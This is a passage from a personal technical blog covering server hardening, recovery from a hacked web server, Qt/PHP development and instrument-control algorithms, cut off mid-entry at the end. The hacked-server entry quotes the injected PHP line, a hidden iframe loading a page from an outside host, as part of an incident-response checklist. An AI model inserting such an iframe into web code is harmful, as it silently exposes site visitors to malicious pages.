Overview of the options:

--tcp Show applications that use the TCP protocol (exclude UDP)
--listen Show only applications that listen, and exclude clients
-p Show the process ID and name of the application to which the port belongs

Netstat sometimes pauses during output. This is normal; it tries to resolve the addresses into human readable host names*. If you don't want this, use the -n option.

Example output from my laptop which runs Fedora 8 (I have removed the columns Foreign Address and State for the sake of brevity):

 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address                PID/Program name   
 tcp        0      0 telislt.sron.nl:irdmi        2381/nasd           
 tcp        0      0 *:55428                      1965/rpc.statd      
 tcp        0      0 telislt.sron.:commplex-main  6573/ssh            
 tcp        0      0 *:mysql                      2307/mysqld         
 tcp        0      0 *:sunrpc                     1945/rpcbind        
 tcp        0      0 192.168.122.1:domain         2533/dnsmasq        
 tcp        0      0 telislt.sron.nl:privoxy      3581/ssh            
 tcp        0      0 telislt.sron.nl:ipp          2553/cupsd          
 tcp        0      0 telislt.sron.nl:smtp         2352/sendmail: acce 
 tcp        0      0 *:8730                       6030/skype          
 tcp        0      0 *:http                       2371/httpd          
 tcp        0      0 localhost6.localdom:privoxy  3581/ssh            
 tcp        0      0 *:ssh                        2205/sshd

Whenever there is an asterisk (star) instead of a host name, netstat tells us that the port is listened to on ALL interfaces, not only the local interface but also any present interfaces connected to the outside world. These are the ones we want to hunt down.

Now that we know the program names, we can find out more about them. We'll take for instance the rpc.statd program. First we locate the complete path of this process:

 $ whereis rpc.statd
 rpc: /sbin/rpc.statd /usr/sbin/rpc.svcgssd /usr/sbin/rpc.idmapd 
 /usr/sbin/rpc.mountd /usr/sbin/rpc.rquotad /usr/sbin/rpc.gssd 
 /usr/sbin/rpc.nfsd /etc/rpc /usr/include/rpc

Whereis does a search and finds /sbin/rpc.statd. On RPM-based systems, we can request more information about the owning package:

 $ rpm -qif /sbin/rpc.statd
 ....
 The nfs-utils package provides a daemon for the kernel NFS server and
 related tools, which provides a much higher level of performance than the
 traditional Linux NFS server used by most users.

Now we know whether we want this package or not. If not, just remove it and the port will be closed. If we need the functionality, does it need to listen to the outside network? If not, we would typically Read The Fine Manual to see whether we can configure this package to listen locally.

Repeating this exercise for each line in the netstat output will tighten a server's security.

  • Just like addresses are resolved into host names, the port numbers are resolved into services using the /etc/services file.

2008-05-22 Configuring AIDE

Today I installed AIDE on a CentOS 5 server. This package is an alternative to the traditional Tripwire. Installation is a cinch with yum:

 $ sudo yum -y install aide

The first thing I ran into was that this server had SELinux disabled. So I had to make the following changes to the supplied configuration file /etc/aide.conf.

I added the following lines close to the top; these are copies of default rules but without the selinux checks (which would otherwise generate errors):

 R =            p+i+n+u+g+s+m+c+acl+xattrs+md5
 L =            p+i+n+u+g+acl+xattrs
 > =            p+u+g+i+n+S+acl+xattrs
 DIR = p+i+n+u+g+acl+xattrs
 PERMS = p+i+u+g+acl

Then as root, initialize the database:

 $ sudo aide --init
 AIDE, version 0.13.1
 ### AIDE database at /var/lib/aide/aide.db.new.gz initialized.

Copy the new database, to make it the baseline to check against:

 $ sudo cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz 

Then create a file named aidecheck in /etc/cron.daily with the following contents:

 #!/bin/sh
 /bin/nice -n 18 /usr/sbin/aide --update | \
    /bin/mail -s "AIDE check on host  `hostname`" root
 cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

Be sure to make the file executable:

 $ sudo chmod 755 /etc/cron.daily/aidecheck

2008-05-21 Code review

I'm doing a code review for our partner in the current project. In a recent
integration test, we found a problem.

An overview of the equipment. We're talking about software running on a
PC104 device (basically a small PC) running Linux. This PC104 has a bunch of
serial ports.

They have a custom I/O card, let's call it Raba1. This card has two serial
ports. The software reads the incoming data from port TTY2, thinks about it
and then sends the appropriate commands out on the TTY1 port. The problem is
that sometimes the software just halts for a minute, doing nothing while
data is actually coming in.

One thing that can go wrong here has its root in the structure of the
software. It basically runs in a big loop, at the start of which is a select()
statement which monitors the two serial ports and the internal command channel
for input.
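
For reference, the skeleton of such a loop in Perl looks roughly like this; the filehandle names and the handle_input dispatcher are mine, not theirs:

  use IO::Select;

  # $tty1, $tty2 and $cmd are already-opened filehandles for the two
  # serial ports and the internal command channel.
  my $sel = IO::Select->new($tty1, $tty2, $cmd);

  while (1) {
      # Block until at least one source has data ready.
      for my $fh ($sel->can_read) {
          my $n = sysread($fh, my $buf, 4096);
          next unless defined $n && $n > 0;
          handle_input($fh, $buf);    # parse and act on the input
      }
  }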

A theory is that it's missing data because the loop isn't fast enough. It
could happen that we send commands to the software through the internal
command channel and while these are parsed and handled, other data comes in
through port TTY2.

What makes this unlikely is that such buffer overflows can be detected by the
Linux serial device driver. These were watched and were not found to correlate
with the pauses.

2008-05-06 Recovering from a hacked server

A friend of mine had a problem with a server on which a particular PHP script kept being changed to include an iframe when it shouldn't.

I took the following steps to see what was happening. This can be used as a checklist.

  • Checked /etc/passwd for strange accounts
  • Did a 'ps -ef' to see what processes were running
  • Checked /var/log/secure for strange logins through SSH
  • Checked for other services running, for example FTP. Checked the logins on that as well.
  • Checked /tmp to see whether any executables were present
  • Checked Apache's default access logs
  • Checked Apache's access logs for each virtual host, paying attention to POST requests
  • Checked world-writeable and tmp directories in user home directories
  • Checked what's in the crontabs
  • Checked the OS version. In this case, found it by doing
  # cat /etc/redhat-release
  CentOS release 4.6

I found nothing weird in Apache's log files, no funny scripts et cetera.

In a bunch of PHP scripts, the following code was appended at the end:

 echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1"
 alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';

Googling for this showed that it's a pretty common attack. Articles suggest it might be a compromised FTP account. Checking the changed files, their timestamps suggest it was all done in one fell swoop.

To see what FTP servers are running:

  # ps -ef

In case I missed anything, see what ports are listened to:

  # netstat --listen --ip -T -p

The -T option won't cut off long addresses and the -p option will print the process that's doing the listening.

Found out in /var/log/messages that a script logged in around the same time that the files were modified.

The conclusion was to do a full OS reinstall, followed by a thorough tightening-up and a code review.

2008-05-06 CSS box model

Lately I've been lurking on the #CSS channel on the Freenode IRC server and I've noticed a lot of questions that basically boil down to a developer not understanding the CSS box model.

The most basic things to remember are, in my opinion, the following.

There are block and inline elements. In simple terms, block elements get a newline after them. Elements like div and p are block elements. Inline elements usually reside in a block element; think of them as stuff you'd put in a paragraph. Anchors and markup like em are all inline elements.

Then there is floating. If you let elements float left or right, they'll "float" to the top of the containing element. Floating elements must have a width applied to them. Multiple elements will float nicely beside each other if there's room.

When you've got a problem, think about the above two things and see if you can figure out what's happening. Don't just ask in the #css channel "what's happening", try to come up with a theory and state it. It'll help you a great deal more.

Also read Mike Hall's primer on CSS Positioning.

2008-04-16 Qt database widgets part 2

Last time I got away without creating a custom QItemDelegate, but not this time. I need a radio button for a database column of which all rows must contain 0 (zero), except one row which must be set to 1 (one). This database column designates the default or current setting.

Presenting the user with a 1 or 0 isn't terribly friendly. Since a QItemDelegate is about both presenting and editing, this is an obvious candidate to be subclassed.

A nice example is the Spin Box Delegate; however, that example creates an editor but not a custom paint method for the normal viewing of the item.

2008-04-16 Qt database widgets

I've been playing with a couple of Qt classes to get an easy-to-use SQL user interface. The combo QTableView and QSqlTableModel seemed very nice. Using the Designer, I could click an interface together and voilà, a nice grid where the user can edit the database.

There were a couple of hiccups. If fields were NULL in the database, these could be filled in but never put back to NULL. After reading and trying out lots of stuff, I found the following classes are involved:

QTableView Provides the general table widget on the screen
QItemDelegate Provides view/edit functions for specific cell types in the table widget on the screen
QSqlTableModel This class provides an easy-to-use API for a database table
QAbstractProxyModel A class that can be stuck over QSqlTableModel to transform, sort or filter data when it comes in or goes out of the QSqlTableModel

You have to think about what functions exactly you want to change. If it's the overall interface, think about the QTableView. In my case, I wanted to enable the user to set fields to NULL. The normal QItemDelegate doesn't allow this.

In the end I avoided the whole issue by using one type field (which can contain 'string', 'integer', 'double' et cetera).

2008-04-15 Opera schade

Always fun, browser wars. Especially in the office.

opera schade.png

For those not in-the-know: the markup is typical for the warnings on packages of cigarettes in the Netherlands. Translation: "Opera causes severe harm to you and others around you".

Stuck on an Opera promotional poster in the office.

2008-03-31 Filtering on packet size

I was recently asked to check how UDP packets without any contents could be
filtered. The reason was that such packets were being used as a Denial of
Service attack against a specific game server. This bug had been acknowledged
by the developers of the server and fixed in a later version, but it wouldn't
be fixed in the older one.

iptables can filter on this as follows:

  $ sudo iptables -A INPUT -p udp --dport 6500 -m length --length 28 -j REJECT

Why length 28? It's UDP over IPv4: the UDP header is a fixed 8 bytes and a
minimal IPv4 header is 20 bytes, so an empty UDP datagram is 28 bytes in
total. (The IPv4 header can be longer if IP options are present, but that's
rare.) Anyway, I've tested the above using netcat:

Start service listening to port 6500 on machine 1:

  $ nc -l -u -p 6500

Open a new terminal on machine 1 and start a traffic dump:

  $ sudo tcpdump -X -vv "port 6500"

Set up a client on machine 2, which sends all input from stdin to machine 1:

  $ nc -u machine1 6500

Now type some text, then press enter. The server will output whatever you
typed. Now just press enter. You're sending a UDP packet whose only content
is the newline character \n. tcpdump should display:

 16:20:43.898341 IP (tos 0x0, ttl  64, id 65431, offset 0, flags [DF],
 proto: UDP (17), length: 29) machine1.6500 > machine2.36237: [bad udp
 cksum 26d!] UDP, length 1
        0x0000:  4500 001d ff97 4000 4011 ca51 ac10 8cb7  E.....@.@..Q....
        0x0010:  ac10 8c0e 1964 8d8d 0009 7101 0a         .....d....q..

Length 29 thus means: 28 bytes of headers plus the one byte of content.
Subtract that byte and you have an empty UDP packet.

If that length doesn't work, you can play with ranges. For example "--length
20:30" means: reject everything between 20 and 30 bytes length.

2008-02-07 the WTF count

As inspired by the comic WTFs per minute, we thought that besides markers like TODO and FIXME, we'd 'really' like vim to highlight the string WTF.

First, you need to locate the syntax file:

 $ locate syntax/c.vim
 /usr/share/vim/vim70/syntax/c.vim

If you're root, just edit this file, search for the line:

 syn keyword       cTodo       contained TODO FIXME XXX

and add WTF at the end of the line.

If you're a mere mortal user, copy this file to your home directory and give it a name such as myc.vim. Then edit the file as described above and add the following lines to your $HOME/.vimrc file:

 au BufRead,BufNewFile *.c set filetype=myc
 au! Syntax myc source $HOME/myc.vim

2008-01-30 Fiske scan analysis

I've written an analysis routine to see how the results of a particular Fiske "scan" hold up. Such a scan means: set a particular FFO current and an FFO control line current, then stepwise increment the latter while measuring the FFO voltage. The scan yields a bunch of voltages. In such a scan, certain areas would never contain values -- search this blog for Fiske steps for more information.

I wanted to visually check the analysis of the routine. A scan can have a lot of outcomes. Say we want to find value 0.863. We'd then do a scan where we're aiming for a resulting voltage between 0.858 and 0.868. Some possible situations that could come out:

 1)    ---*-*-*-*-*-*-*-*-*--   Very nice step found
 2)    -*-*---------*-*-*-*-*   Found two steps, at the right is biggest
 3)    -*-*-*-*-*--------*-*-   Found two steps, at the left is biggest
 4)    **-*---------------*-*   Found two steps but they're both too small
 5)    ----------------------   No (or not enough) points found at all
 6)    --*-*-*-*-*-----------   One step found, but it's not nicely balanced

I've retrieved some test values and the scan results (without the FFO plot behind it) look as follows. The X axis displays the FFO voltage in mV. Note that the Y axis is a simple counter in this case, and is meaningless. It's also in reverse: the lower the value on the Y axis, the more recent the results on the X axis. The black line is the value that we're aiming at.

fiske scan 1.png

The first couple of lines (starting at the top) show the results of the setup phase of the Fiske macro. These can be ignored; they're not used for analysis.

Let's zoom in on the first lines (i.e. where the Y axis shows '42').

fiske scan 1 zoomed.png

We're looking for a line that's nicely centered around value 0.863 mV.

We can say the following things about the first bunch of lines below the setup lines:

  • They all contain enough points, enough so we can analyze them
  • They're all right in the middle between two "rows of points".
    Since we need a row with a bunch of points centered around our value of 0.863, the rows from 42 down to 28 are all useless.

Now what does the analysis routine say?

 Line 46 gives result: Last scan contained only 7 points
 Line 45 gives result: Last scan contained only 4 points
 Line 44 gives result: Last scan contained only 4 points
 Line 43 gives result: Last scan contained only 4 points
 Line 42 gives result: Last scan contained only 4 points
 Line 41 gives result: Last result had a skewed result set
 Line 40 gives result: Last result had a skewed result set
 Line 39 gives result: Last result had a skewed result set
 Line 38 gives result: Last result had a skewed result set
 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Good result found
 Line 33 gives result: Good result found
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set

Obviously the procedure thinks that lines 34 and 33 have a pretty good result, which is not the case.

After adjusting the analysis routine, the following output is shown:

 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Last result had a skewed result set
 Line 33 gives result: Last result had a skewed result set
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set
 Line 27 gives result: Last result had a skewed result set
 Line 26 gives result: Last result had a skewed result set
 Line 25 gives result: Last result had a skewed result set
 Line 24 gives result: Last result had a skewed result set
 Line 23 gives result: Good result found
 Line 22 gives result: Good result found
 Line 21 gives result: Last result had a skewed result set
 Line 20 gives result: Last result had a skewed result set
 Line 19 gives result: Last result had a skewed result set
 Line 18 gives result: Last result had a skewed result set

Still not OK. What's wrong here is that the subroutine for detecting a skewed result set runs first. After that succeeds, a check still needs to be added to see whether the set actually covers the target X value.
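
That check is simple enough; a sketch in Perl (voltages in mV):

  # Does the result set actually cover the target X value, i.e. are
  # there points on both sides of it?
  sub covers_target {
      my ($target, @points) = @_;
      my $left  = grep { $_ <  $target } @points;
      my $right = grep { $_ >= $target } @points;
      return $left > 0 && $right > 0;
  }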

2008-01-02 Fiske results

Finally some visual results from the Fiske step routine.

fiske results1.png

This image shows the FFO as it's always drawn: bias current on the Y axis and resulting measured voltage on the X axis. The color displayed is the voltage on the SIS junction.

The blue lines are the scans as executed by the Fiske macro. As a reminder, such a macro is a list of commands for the FPGA on the electronics boards. The Fiske macro keeps the FFO bias on a single value, while the FFO control line is stepped up. As can be seen, the control isn't very regulated; the blue lines shift a little at the left and right edge. Well, actually it shifts more than a 'little'. The left is completely off :-)

To fix this, the starting point (the leftmost point) of each scan should be in line with the previous scan. The first point that's just over Vstart (see previous entries) is probably very nice.

What's happening now is that the procedure tries to find a good point in the scan part of the macro -- when actually a good point could reside in the find up part of the macro. So this problem is fixed by searching in that first find up part as well.

Note that currently, an analysis is run on each line. Normally, the scan would be stopped once the analysis is positive. This is the case when the blue line sees that it's right inside a cloud of points (where reading out the PLL IF voltage reports 0.4 V or higher). However, my Russian colleague gave the advice to let it run somewhat and see whether the analysis can be better.

2007-11-28 Testing optimization

After running the Fiske macro for the setup part, we have a nice value for the FFO Control Line (CL) current. Funny enough when we use this value, the macro immediately returns, saying that setting this CL will make the FFO voltage higher than requested.

Thinking about it, this can either be a measurement error or something else. I tried to rule out measurement error by running the 'measure offsets' routine.

Later, I found out several things. Firstly, the FFO bias and CL weren't set to 0 before attempting to run the Fiske macro. This is important because otherwise with a second scan we would get different results. This turned out to be the culprit.

The next problem was that the macro reported not being able to find the FFO voltage start. After checking the output of the macro, I found this funny: the macro reported that it tried to use the previously found settings.

In other words: the previous run found a certain voltage when setting FFO bias and CL. Trying again with a slightly lower FFO bias and it fails -- while the physics tell me this shouldn't happen.

I tried upping the Find Step Up value, but this didn't help. After discussion and a cup of coffee, it turns out that I wasn't making the same settings at all: the FFO start voltage in setup step 2 is NOT the same as the FFO start voltage in setup step 1...

When that was done, I still found that the macro returned value 1.0237 as the first result, while I had put the limit at 1.0231. It was beside the point, but I needed many more values, so I made the FFO CL scan step not 40 times bigger than the normal scan step, but 10 times. This resulted in not 13 pairs (of FFO voltage/CL current) to choose from, but up to 32. This again was pushing the limits of the macro, since the macro is limited to 32 and will return an error code if it hits that limit. So I switched it back to 20 times, which seems enough for now.

Still I encountered the following:

FFO CL    FFO bias  Resulting FFO voltage
40.17253  3         0x058B
40.17253  2.9       0x597

So: setting the same FFO CL but a different lower FFO bias resulted in a higher FFO voltage! That's physically not possible so something had to be going on here. After adding debugging,... the problem disappears. This is good for speed, but not so for understanding.

The next problem seems to be that the macro output is misinterpreted; there are different result codes for getting the right FFO voltage: with stepping up and without. The latter means that the first FFO bias/control line we set immediately results in a good voltage. I didn't account for that.

The macro now had the problem that after a number of successful scans with not enough points, results came up where Vstart couldn't be found. A programming error caused the FFO bias to be held constant, when it actually should be lowered by a small step. After fixing that, it turned out that the current stepsize wasn't good enough either. This is because if you keep the FFO CL the same but lower the FFO bias, you get a slightly lower FFO voltage as a result. Thus with each FFO bias step down, the stepsize should be increased to find the FFO Vstart again.

That stepsize for the FFO CL is 0.02 mA. This amount covers a resulting range from Vzero to Vstart of roughly 0.8 mV. (The point Vzero is the FFO voltage that results from setting the last measured FFO CL.) Each decrease of the FFO bias causes a decrease in Vzero of, on average, 0.001236 mV. The area thus increases by 0.1235 percent, and the stepsize should be increased by the same percentage. Alternatively, we could increase the number of steps that the macro does -- but since that makes the routine slower, I prefer the former solution.
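
In code, that correction is a simple compounding factor per bias decrement; a sketch using the percentage quoted above:

  my $step = 0.02;                 # FFO CL scan stepsize in mA
  my $pct  = 0.1235;               # average growth of the Vzero-Vstart area, percent
  for my $decrement (1 .. 10) {    # ten FFO bias steps down
      $step *= 1 + $pct / 100;     # grow the stepsize along with the area
  }
  printf "stepsize after 10 bias decrements: %.5f mA\n", $step;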

After making the changes, the routine still can't find Vstart after a couple of FFO bias decrements. Analyzing the area that's covered from Vzero to Vstart, but this time in raw values, it seems that it increases by about 3 bitsteps every FFO Bias decrement. This is a lot since the actual area between Vstart and Vstop is only 3 bitsteps in and of itself! Since it's all too easy to make the step up size so large it passes over Vstop, I increase the maximum number of steps in the macro. It's now 32 and I increase it to 128.

On the first test I run, this number turns out to be irrelevant. The procedure bumps into two Fiske steps. The first is bridged by the increasing FFO CL, the second isn't. The macro thus returns that the scan steps are too small, when in actuality we just can't cross the gap over the second Fiske step, so the target Vstop is never reached. Should we increase the scan step? I don't think so -- that'll make the macro give fewer results between Vstart and Vstop. Should we increase the number of scan steps? I don't think so either -- it's not a goal in itself to get to Vstop.

The answer lies in the analysis: this macro result should not be treated as an error. It's a situation where there's enough data and we should analyze it instead. However, it can still be a genuine error when we're in the first scan after the setup.

After fixing this came the case where a programming error kept causing the analysis to fail and say that every detected point was to the left. Then another where the voltage range around the center was a factor of ten too small.

What's still happening is that with every FFO bias decrement, the Vzero-Vstart range gets larger and larger. The FFO CL handling needs to be looked at; something like copying the previously found nice value and passing it to the macro.

2007-11-19 Finding an optimum

As mentioned before, we need an algorithm to find the correct setting in a cloud of points.

I've gotten an explanation on how Andrey (the software developer of the Russian team) does this and I've tried to describe it using our macro, which should be faster in flight.

What does their routine do? It takes the FFO voltage upper and lower limit as well as an FFO bias current and FFO control line (CL) current. The routine then starts. It's divided into two parts:

  • Initial setup to find the correct setting of the FFO bias and control line that results in an FFO voltage between the limits, let's call these (FFO) Vmin and Vmax
  • Further fine-tuning that lowers the FFO bias and does a new FFO CL sweep in order to avoid the Fiske steps

The main thing to remember for the initial setup is that if you set the FFO bias current and CL current, you don't know the resulting FFO voltage. You'll have to measure it back to know how you're doing. The main thing to remember for the fine-tuning is that we want to find an FFO bias and CL current that result in an FFO voltage that's right between Fiske steps since the sensor is less sensitive to temperature changes.

For the first part, it lowers Vmin by ten percent. The FFO bias current is then set and the FFO CL is swept, each time reading back the FFO voltage. If the voltage falls between Vmin and Vmax, or maybe somewhat over them, the bias current has a good value. If however the voltage "jumps", i.e. a value is read back that is outside Vmax, the sweep is stopped and has failed. These jumps occur because above a certain point in the I/V curve for that particular FFO, the same current yields a wildly different voltage.

Upon failure, which is quite likely the first couple of sweeps, the FFO bias is set lower and a new sweep is started. When success occurs, the fine-tuning starts.

When fine-tuning starts, we know the FFO bias current to set, as well as the FFO CL lower and upper limit which results in the FFO voltage Vmin and Vmax. What is done now, is request, say, 8 points in this space and then see if the gap between these points is so big that we can safely say that it's a Fiske step. If so, the FFO bias current is lowered and another sweep is done.
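
In outline, the initial-setup phase could then look like this in Perl; every hardware-facing function and constant here is a hypothetical stand-in, not Andrey's actual code:

  my $bias = $BIAS_MAX;
  my $vmin = $VMIN * 0.9;       # lower Vmin by ten percent
  my @pairs;

  while ($bias >= $BIAS_MIN) {
      set_ffo_bias($bias);
      # Sweep the FFO CL, reading back the FFO voltage at each step;
      # an empty list means a "jump" outside Vmax was seen.
      @pairs = sweep_control_line($vmin, $VMAX);
      last if @pairs;           # success: on to fine-tuning
      $bias -= $BIAS_STEP;      # failure: lower the bias and retry
  }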

Below is a screenshot (actually a photo) of Irtecon, Andrey's implementation:
irtecon fiske steps.jpg

Now on to our own problem; recreating the above with our macro.

The macro basically sets the FFO bias current and then sweeps over the FFO CL current. It'll read out the FFO voltage with each step of the sweep. Given Vmin and Vmax, it will bail out if the FFO voltage isn't between the limits. I thought I could just pass 0x0000 and 0xFFFF as the limits, so these wouldn't effectively be checked and all values would be returned. But alas, that won't work. During the macro's setup part, it'll try to make small steps towards Vmin, and it'll bail out as well if that's not reached. However, when it is found, a sweep is made.

With the macros we could reproduce the same two phases that were explained above. We'll start with the user giving the example parameters.

  • Set the frequency, out of which follow the FFO voltage Vmin and Vmax
  • Set the minimum and maximum FFO bias
  • Set the minimum and maximum FFO Control Line

The macro also has a couple of values which we'll fill in for ourselves:

  • Stepsize-up, used to initially get between Vmin/Vmax
  • Stepsize-down, used to find Vmin
  • Stepsize-scan, used to completely cover the area between Vmin/Vmax

For the initial setup, using the macro should be something as follows:

  • Set the FFO Vmin to 0 and upper limit to user setting
  • Set the maximum FFO bias and minimum FFO CL (with the FFO bias, we work our way down from the top)
  • For stepsize-up, use 0.1 mA; it doesn't matter what's entered here as long as it's a fraction of the FFO Vmax
  • For stepsize-down, we'll use a fifth of the stepsize-up. With this value, a couple of steps are taken until the macro will reach the Vmin.
  • Then the stepsize-scan is set to Vmax divided by 20.
    This way, the macro will return about twenty values. We can then refine Vmin and thus get closer to the user-defined limits.

The macro can return nine result codes of which two are actually successful. The first few times, I got a 0 which means that the FFO CL setting is below FFO bias.

For the fine-tuning:

  • TBD

To debug, we need good visualization, and what we have isn't good enough for this particular purpose yet. We can draw a plot and then redraw it, including the results of the macro. What we can't do is clear out the macro results and begin again with the original plot. So that's on the to-do list as well.

2007-11-15 diff tools

Previously, I've written about meld, a very nice graphical diff tool.

However, meld requires a graphical environment and this isn't always available. Vim however, is pretty much always available and has a diff tool built-in.

Just start vim as follows:

  $ vimdiff file1 file2

Screenshot:

vimdiff2.png

Visually it's pretty self-explanatory. Red parts are not in the other file; blue ones are empty parts where the other file has a red part. What you probably want to know is how to quickly shift differences between the files.

dp The difference is pushed to the other file. Use this when the cursor is on a red part.
do The difference is obtained from the other file. Use this in a blue part.

There are many options, check out the vim documentation on diff mode.

2007-10-27 Thinking about wizards

In the previous post, I talked about how I was coding up a wizard-type bunch of screens, using the MVC pattern as implemented by PEAR's HTML_QuickForm_Controller class. Each screen basically has three actions: 'display screen', 'previous screen' and 'next screen'. The last screen has the action 'finish'.

You have to be careful with this approach; the number of actions probably isn't limited to these at all. Consider the following example:

  1. In screen 1, the user must make a choice: do you want apples or bananas? User chooses apples.
  2. In screen 2, the number of apples is calculated and displayed. This took 20 seconds. Then the user chooses the percentage of the apples.
  3. In screen 3, the user must choose how the delivery is made.

Suppose the user goes back from three to two. The 'display' action is called and, using the choice from the first screen, the number of apples is recalculated. But that's not what the user wants; he just wishes to change the percentage of apples.

So what we need is an action that's derived from 'next', let's call it 'calculate'. This action then checks whether there was a previous choice, whether this differs from the current choice and if so, does a new calculation. The result is saved in the session. We then do whatever 'next' normally does.

2007-10-26 PEARs HTML QuickForm Controller goodness

I'm in the middle of coding up a multi-page wizard-style bunch of PHP pages. The MVC pattern is implicit herein. It looked like it'd be useful to use the PEAR class HTML_QuickForm_Controller. In combination with HTML_QuickForm for the model, this is a pretty powerful business. As the view, the PEAR package HTML_Template_IT is used.

However, it turns out that debugging can be quite painful. Because the controller and the view part are so loosely coupled, it can be troublesome when it doesn't work.

I defined the 'cancel' action besides the default stuff like 'previous' and 'next'. The related class, which is called when the button is pressed, cleared all values from the session.

The cancel button didn't work; instead it just submitted and the controller served up the next step in the wizard. The difference turned out to be as follows:

  $submit[] =& $this->createElement('submit',
      $this->getButtonName('cancel'), "Cancel");    
  $submit[] =& $this->createElement('submit',
      $this->getButtonName('next'), t('Next'));
  $this->addGroup($submit, "submit");

That last line should be:

  $this->addGroup($submit, 'submit', '', '&nbsp;', false);

It's really about that last parameter, the false boolean. This generates a button with name _qf_domregform_cancel instead of submit[_qf_domregform_cancel]. Why the controller interprets this differently, I don't know.

But I do know it took a lot of time to find the culprit. Basically what I did was take the example code and adapt one page step-by-step towards the page that I coded for the website.

That's not my idea of debugging, but I'm not sure how else the bug could've been narrowed down.

Here's another one. In my wizard, the third step is to choose how DNS is set up. It's a radio button that lets the user choose between 'standard' and 'advanced'. My first attempt looked like this:

 $dns1 =  new HTML_QuickForm_radio(null, 's', 'Standard');
 $dns2 = new HTML_QuickForm_radio(null, 'a', 'Advanced');
 $this->addGroup(array($dns1, $dns2), 'DNS_server', "Choose setting for DNS server");

The problem with the above code is that it doesn't remember its setting when the user goes back from step four to step three. The code below will correctly do this:

 $radio[] = &$this->createElement('radio', null, null, 's', 'Standard');
 $radio[] = &$this->createElement('radio', null, null, 'a', 'Advanced');
 $this->addGroup($radio, 'DNS_server', "Choose setting for DNS server");

Now what is the difference? It can't be seen in the HTML source, so I looked at the PHP code but I couldn't see the difference in the five minutes I checked.

My point to all this is that there is more than one way to do the job, but if it's not the correct one, it silently fails without any message.

That makes a developer's job harder.

2007-09-26 Fiske steps testing

We did some testing of the new Fiske step software yesterday. To see how the device (the SIR chip) behaves, we first ran a plot where we set the FFO bias current and read out the FFO bias voltage.

Some plots of an area with Fiske steps, where the Y axis is the FFO bias current and the X axis is the FFO voltage:

fiske1.png

If we make a much finer scan, it looks like this:

fiske2.png

What is basically seen, is a cloud of points that is formed by setting the bias current on the FFO and then reading out the voltage. Each line means a different current setting on the FFO control line (FFO CL). (For an explanation of the SIR including FFO control line, see entry 2006-04-24 SIRs for dummies).

Note that we've scanned for a limited number of control lines.

Now if we want to have the FFO beam at a certain frequency, we calculate which voltage we need by dividing the frequency by the Josephson constant. To make it easy to understand, say we want to find a Fiske step at 0.7 mV.

Some research was done by the Russian researchers, and what came out is that the procedure to find a good Fiske step must be done by setting the FFO bias, then proceeding to increase the FFO CL. If no good Fiske step is found, the FFO bias must be lowered, and the FFO CL must be reset and increased again up to a certain point.

So there are two loops going on: in the inner loop we sweep the FFO CL and get a bunch of value pairs -- FFO bias voltage and FFO CL current -- and in the outer loop, we lower the FFO bias current. Basically, you get a horizontal cut from the plots seen above.

You could just follow the lines that are drawn above, which each connect one FFO CL setting. If you did that, you'd get results with the same FFO CL setting. This might seem logical when looking at the plots above; however, we follow the advice of the Russian team on this point.

Let's see if we can find some numbers that a Fiske step procedure should use. I've graphically extrapolated picture 1 as follows:

fiske3.png

The blue lines are extrapolated clouds of points. The green line is a possible combination of FFO bias current and FFO voltage. The fat green line could be a possible scan area where we want to find a good Fiske step.

What you can see is that if you start looking at 32 mA for a good Fiske step, you will keep scanning down until you hit 27 mA. If you had begun at 32.5 mA, you would immediately have hit a good point. Scans should thus cover at least 5.5 mA.

However, there's another input we must keep track of: the setting of the FFO control line. I haven't displayed the plot here, but for each milliampere change in the FFO bias, we upped the FFO CL by 1.2 mA.

Right, so how do we know we should stop the Fiske step procedure? Then we'll have to look at the second plot again and see how wide those clouds are. Roughly it looks like it's 2.5 uV (yeah that's microvolts) wide. If we do a sweep of at least 10 settings on the FFO CL current where we make sure we have a result of the FFO voltage with a width of 5 uV, we can see if the points that come out are centered around the target voltage (e.g. frequency).

Some questions remain:

  1. Is our measurement accuracy good enough for getting results with a width of a couple of hundred nanovolts? What FFO CL current do we scan with in that case? Is our DAC accurate enough to set that current?
  2. Is that FFO CL increment of 1.2 mA (each "outer loop" of the scan) a good idea? Why not more or less? How is this influenced during flight?
  3. Should we read out the SIS voltage and compare it with its optimum?
  4. By how many uA must the FFO CL be increased to measure -- within 10 uV -- ten points? (The points being FFO bias voltage measurements.)

Those questions might be answered as follows:

  1. This is device-dependent and must be characterized by making FFO plots and seeing at which FFO CL the SIS mixer has the correct voltage.
  2. The SIS mixer has one optimum voltage which can be seen by pulling a SIS plot. There already is a routine which optimizes the FFO control line and we need to think about how this relates to the Fiske step procedure.

2007-08-20 Configuring SSH daemon

If you want to configure the SSH daemon on a remote machine, you probably don't want to risk the chance of locking yourself out. Nowadays, properly configured machines can restart the SSH daemon while retaining the running connections. That's great, but if you don't want to rely on that, read on.

We want to start a separate, temporary SSH daemon. Dropbear is great for that. We'll do just enough to run a temporary copy for the duration of configuring the regular SSH daemon installation; we won't install Dropbear permanently.

Download the latest release on the remote machine. In a user account, unpack and compile it:

  remoteserver$ tar xfz dropbear-0.50.tar.gz
  remoteserver$ cd dropbear-0.50
  remoteserver$ ./configure
  remoteserver$ make

Now generate a key for the server:

  remoteserver$ ./dropbearkey -t rsa -f key.rsa

The server can be started and we'll use some high port so as not to get in the way of other services. Port 31337 is used below:

  remoteserver$ sudo ./dropbear -p 31337 -r ./key.rsa

From your local machine, you should now be able to reach the server:

  localmachine$ ssh -p 31337 remoteserver

Log in and configure the regularly installed SSH daemon. Restart it, do whatever you like. When you're done, exit and log in again as you'd normally do (i.e. not using the dropbear server but the regularly installed SSH server). If all is successful, kill the dropbear server and wipe out the temporarily compiled copy:
